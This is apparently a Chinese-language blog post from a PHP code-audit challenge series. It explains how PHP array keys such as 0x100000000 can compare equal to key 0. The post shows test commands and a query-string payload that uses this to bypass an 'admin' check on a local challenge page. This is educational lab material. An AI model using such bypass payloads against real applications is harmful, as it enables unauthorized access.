<h1><span id="twenty">Twenty</span></h1><p><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679562816657-25611b7e-a2ec-4ab0-80d0-bb0c9c4122c2.png#averageHue=%23fefefe&clientId=u4c5aef03-c956-4&from=paste&height=302&id=u5eaf4365&name=image.png&originHeight=302&originWidth=706&originalType=binary&ratio=1&rotation=0&showTitle=false&size=4956&status=done&style=none&taskId=ub492c55f-e4e0-4de5-894b-d16a561553a&title=&width=706#averageHue=%23fefefe&id=XKscC&originHeight=302&originWidth=706&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"><br>我们直接看后面 if 中的判断逻辑：</p>
<ul>
<li>$_GET[‘user’] 是一个全局的变量，我们传的是字符串，它就是字符串，传的是数组，那么它的值就是数组</li>
<li>$user 是一个数组, [0 &#x3D;&gt; ‘admin’, 1 &#x3D;&gt; ‘xxoo’]</li>
<li>&#x3D;&#x3D;&#x3D; 三个等号的意思就是类型是同一类型，并且值也是相同的</li>
<li>$_GET[‘user’][0] 的值不能等于 ‘admin’</li>
</ul>
<p>也就是说，如果要使这个 if 条件成立，就必须让两个键值不相等的数组经过 &#x3D;&#x3D;&#x3D; 比较后返回 true。<br>4.然后我们测试：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">php -r &quot;var_dump([1=&gt;0]==[1=&gt;0]);&quot; <br>bool(true) <br>php -r &quot;var_dump([1=&gt;0]===[1=&gt;0]);&quot;<br>bool(true) ➜ <br>php -r &quot;var_dump([1=&gt;0]==[2=&gt;0]);&quot;<br>bool(false) <br>php -r &quot;var_dump([1=&gt;0]===[2=&gt;0]);&quot;<br>bool(false)<br></code></pre></td></tr></table></figure>

<p>然后我们再来看我们这个漏洞：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">php -r &quot;var_dump([0 =&gt; 0] === [0x100000000 =&gt; 0]);&quot; <br>bool(true)<br></code></pre></td></tr></table></figure>

<p>键名为 0 的数组与键名为 0x100000000 的数组居然相等了！<br>也就是说：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">$user : [0 =&gt;&#x27;admin&#x27;, 1=&gt;&#x27;xxoo&#x27;]; <br>$_GET[&#x27;user&#x27;]: [0x100000000 =&gt;&#x27;admin&#x27;, 1=&gt;&#x27;xxoo&#x27;]<br></code></pre></td></tr></table></figure>

<p>这样就能使题目当中的条件成立。</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="http://localhost:23130/challenge19.php?user%5B429496729600000000%5D=admin&user%5B1%5D=xxoo">http://localhost:23130/challenge19.php?user[429496729600000000]&#x3D;admin&amp;user[1]&#x3D;xxoo</a></p>
</blockquote>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679563229565-0af4a1fe-8876-4106-adf9-842caca55417.png#averageHue=%23fbfbfb&clientId=u4c5aef03-c956-4&from=paste&height=1209&id=u8efc8620&name=image.png&originHeight=1209&originWidth=1390&originalType=binary&ratio=1&rotation=0&showTitle=false&size=211557&status=done&style=none&taskId=uea03482c-3af9-40d9-9ef9-0e63156a0a9&title=&width=1390#averageHue=%23fbfbfb&id=Bm5n4&originHeight=1209&originWidth=1390&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"></p>

      </div>
    </div>
  </article>
  <div class="post__foot">
    
    <div class="post-nav">
  
    <a class="post-nav-item-left" href="/2023/03/24/Challenge-21-25/">
      <div class="text-align">
        <svg t="1670570876164"
             class="icon"
             viewBox="0 0 1024 1024"
             width="16"
             height="16">
          <path d="M384 512L731.733333 202.666667c17.066667-14.933333 19.2-42.666667 4.266667-59.733334-14.933333-17.066667-42.666667-19.2-59.733333-4.266666l-384 341.333333c-10.666667 8.533333-14.933333 19.2-14.933334 32s4.266667 23.466667 14.933334 32l384 341.333333c8.533333 6.4 19.2 10.666667 27.733333 10.666667 12.8 0 23.466667-4.266667 32-14.933333 14.933333-17.066667 14.933333-44.8-4.266667-59.733334L384 512z" p-id="14596"/>
        </svg>
        <span class="text-small">上一篇</span>
      </div>
      <div>Challenge-21-25</div>
    </a>
  
  <div class="vhr"></div>
  
    <a class="post-nav-item-right" href="/2023/03/22/POP%E9%93%BE/">
      <div class="text-align">
        <span class="text-small">下一篇</span>
        <svg t="1670570876164"
             class="icon"
             viewBox="0 0 1024 1024"
             transform="scale(-1,-1)"
             width="16"
             height="16">
          <path d="M384 512L731.733333 202.666667c17.066667-14.933333 19.2-42.666667 4.266667-59.733334-14.933333-17.066667-42.666667-19.2-59.733333-4.266666l-384 341.333333c-10.666667 8.533333-14.933333 19.2-14.933334 32s4.266667 23.466667 14.933334 32l384 341.333333c8.533333 6.4 19.2 10.666667 27.733333 10.666667 12.8 0 23.466667-4.266667 32-14.933333 14.933333-17.066667 14.933333-44.8-4.266667-59.733334L384 512z" p-id="14596"/>
        </svg>
      </div>
      4-POP链
    </a>
  
</div>

    
      <div class="related-post">
  <div class="related__head">
  <a href="/tags/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" class="post-tag">#PHP代码审计</a>

</div>
  <div class="realated__body">
    
      DEBUG: 请安装插件 <a target="_blank" rel="noopener" href="https://github.com/tea3/hexo-related-popular-posts">hexo-related-popular-posts</a> 或关闭 related_post 配置!
    
  </div>
</div>

    
    
  </div>

    </div>
    <div class="foot">
      <div class="foot-inner">
        <div class="foot__head">
          
            <div class="foot-line">
              
                <div class="matts">浮</div>
              
                <div class="matts">云</div>
              
                <div class="matts">游</div>
              
                <div class="matts">子</div>
              
                <div class="matts">意</div>
              
            </div>
          
            <div class="foot-line">
              
                <div class="matts">落</div>
              
                <div class="matts">日</div>
              
                <div class="matts">故</div>
              
                <div class="matts">人</div>
              
                <div class="matts">情</div>
              
            </div>
          
        </div>
        <div class="foot__body">
          
          
            <div class="foot-item">
              <div class="foot-item__head">账号</div>
              <div class="foot-item__body">
                
                  <div class="text">
                    <img alt="link" height="20px" width="20px" src="/images/logo-github.svg"/>
                    <a class="foot-link" target="_blank" rel="noopener" href="https://github.com/x0blank">github</a>
                  </div>
                
              </div>
            </div>
          
          <div class="foot-item">
            <div class="foot-item__head">联系</div>
            <div class="foot-item__body">
              <div class="text">
                <img alt="link" height="20px" width="20px" src="/images/icon/icon-email.svg"/>
                <a class="foot-link" href="mailto:chenxiaolong592@gmail.com">chenxiaolong592@gmail.com</a>
              </div>
            </div>
          </div>
        </div>
        <div class="copyright">
          <a href="http://example.com">Blanks'Blog</a> &nbsp;|&nbsp;由&nbsp;<a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a>&nbsp;及&nbsp;
          <svg width="20" height="20" viewBox="0 0 725 725">
            <path fill-rule="evenodd" fill="rgb(221, 221, 221)" d="M145.870,236.632 L396.955,103.578 L431.292,419.44 L156.600,522.53 L145.870,236.632 Z"/>
            <path fill-rule="evenodd" fill="rgb(159, 159, 159)" d="M396.955,103.578 L564.345,234.486 L611.558,513.469 L431.292,419.44 L396.955,103.578 Z"/>
            <path fill-rule="evenodd" fill="rgb(0, 0, 0)" d="M431.292,419.44 L611.558,513.469 L358.327,595.18 L156.600,522.53 L431.292,419.44 Z"/>
          </svg>
          <a target="_blank" rel="noopener" href="https://github.com/hooozen/hexo-theme-tranquility">致远</a>&nbsp;驱动
        </div>
      </div>
    </div>
    
    
  

  </body>
</html>